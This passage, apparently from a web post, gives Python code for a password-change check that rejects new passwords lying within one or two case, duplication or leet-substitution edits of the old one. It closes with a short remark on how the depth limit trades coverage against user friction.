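LEET = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$", "t": "7"}


def single_transforms(pw: str) -> set:
    """Every string reachable from pw by exactly one listed transform."""
    out = set()
    for i, ch in enumerate(pw):
        # change the case of one letter
        if ch.isalpha():
            out.add(pw[:i] + ch.swapcase() + pw[i + 1:])
        # duplicate one character (letter, digit or symbol)
        out.add(pw[:i] + ch + pw[i:])
        # leet substitution of one character, in either direction
        low = ch.lower()
        if low in LEET:
            out.add(pw[:i] + LEET[low] + pw[i + 1:])
        for plain, sub in LEET.items():
            if ch == sub:
                out.add(pw[:i] + plain + pw[i + 1:])
    return out


def transform_distance(old: str, new: str, max_depth: int = 2):
    """Smallest number of transforms (at most max_depth) turning old into
    new, or None if new is not that close to old."""
    if old == new:
        return 0
    frontier = {old}
    seen = {old}
    for depth in range(1, max_depth + 1):
        next_frontier = set()
        for pw in frontier:
            for candidate in single_transforms(pw):
                if candidate == new:
                    return depth
                if candidate not in seen:
                    seen.add(candidate)
                    next_frontier.add(candidate)
        frontier = next_frontier
    return None


def accept_password_change(old: str, new: str, max_depth: int = 2) -> bool:
    """Policy hook: allow the change only if new is not a near-transform of old."""
    return transform_distance(old, new, max_depth) is None


if __name__ == "__main__":
    # Constructed examples mirroring the post's raven -> r@v3n illustration.
    for old, new in [("raven", "r@v3n"), ("raven", "Raven"), ("raven", "eagle")]:
        print(old, "->", new, "distance", transform_distance(old, new),
              "accepted" if accept_password_change(old, new) else "rejected")
```

The depth limit keeps the search small (a few hundred candidates for a short password at depth 2) and bounds how much the check reveals about the old password; raising it or adding the month-suffix pattern from the post's list (password-Sep, password-Oct) would catch more of the related passwords the study found, at the cost of more user friction.<br />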